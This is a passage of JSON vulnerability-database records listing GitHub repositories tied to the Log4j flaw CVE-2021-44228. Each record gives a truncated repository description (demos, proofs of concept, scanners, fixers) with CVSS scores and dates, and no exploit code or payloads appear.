"description": "# f5-waf-enforce-sigs-CVE-2021-44228\nThis enforces signatures fo...", "cvss3": 
{"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-11T21:59:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-11T20:16:18", "id": "DA01F84A-9B1D-5337-A465-2A9AB088C056", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:24", "description": "# Log4j 2 CVE-2021-44228 \u6d4b\u8bd5\u6837\u672c\u5e94\u7528\n\n\u57fa\u4e8e spring-boot-starter-log4j2:2...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-11T15:18:42", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-23T06:12:54", "id": "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:57", "description": "# docker-log4shell\n\nSimple Go app / Docker image for playing wit...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T13:19:50", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T13:23:50", "id": "0E43C674-363B-53C2-8686-6F412A995AF4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2023-11-28T02:34:06", "description": "# CVE-2021-44228 in Minecraft\n- Java 16\n- Paper server build #39...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T11:22:51", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T06:41:00", "id": "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:43", "description": "# CVE-2021-44228-log4Shell exploit\n\n## Exploit Test\n\n- runs ping...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T12:27:39", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-07T20:25:29", "id": "06D271D5-7A61-5692-9778-7F521D52F980", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:48", "description": "# CVE-2021-44228-docker-example\n\nA simple demonstration of CVE-2...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T10:53:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T03:58:51", "id": "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "href": "", 
"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:28", "description": "# Log4j-check\n\u652f\u6301RC1\u7ed5\u8fc7\nlog4J burp\u88ab\u626b\u63d2\u4ef6\u3001CVE-2021-44228\u3001\u652f\u6301RC1\u7ed5\u8fc7\u3001\u652f\u6301js...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T01:55:51", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-27T02:45:27", "id": "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:57", "description": "# CVE-2021-44228\nMass recognition tool for CVE-2021-44228\n\n## ne...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}}, "published": "2021-12-13T13:25:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:39", "id": "D2602292-4969-564A-915E-2EFC6661FA35", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:05", "description": "# log4jScan\nsimple python scanner to check if your network is vu...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T10:59:50", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-27T15:27:38", "id": "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:31", "description": "# CVE-2021-44228-Demo\n\nThis project for prove and testing zero-d...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-14T04:09:02", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T07:13:10", "id": "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:06", "description": "# Log4Shell Exploit Test\n\nThe goal of this project is to demonst...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 
10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T20:54:10", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T08:30:57", "id": "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:16", "description": "# Log4j-Checker\nThis repository contains scripts that can help i...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T21:11:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T15:16:18", "id": "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:59", "description": "# Log4j Updater\n\nWith the inevitable need to update the famous J...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T04:08:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T17:25:55", "id": "4288177C-C609-5D55-A845-D6785929AB4D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:27", "description": "Log4Shell Hotfix Side Effect Test Case\n=========================...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T13:14:34", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-28T20:50:34", "id": "016A0841-D1FF-5056-B062-0D08FCE624CB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:24", "description": "# CVE-2021-44228-POC\nYet another CVE-2021-44228 POC\n\nAffected Lo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T17:42:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T19:25:27", "id": "DBBD6963-3870-5117-A829-3DE976AE90E2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:30:48", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\nVersions Af...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-16T14:31:14", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T14:31:45", "id": "5C116D88-E2CC-5BC3-9A71-3174292E227D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:30:37", "description": "# log4shell4shell\nLog4j - Multitool. 
Find & fix possible CVE...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-16T23:13:09", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-23T23:26:29", "id": "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:29:16", "description": "# log4j-pcap-activity\nA fun activity using a packet capture file...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-18T16:09:49", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-18T10:59:33", "id": "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:26:31", "description": "# XSYS-Log4J2Shell-Ex\n`CVE-2021-44228 (log4j2shell)` PoC as part...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-25T12:53:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T20:08:44", "id": "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2023-11-28T02:24:12", "description": "# Log4Shell\n\nCe projet est une d\u00e9monstration du fonctionnement d...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-01-12T23:44:20", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-12T23:59:13", "id": "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:29:16", "description": "# log4fix\nThis tool is to detect and fix the log4j log4shell vul...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", 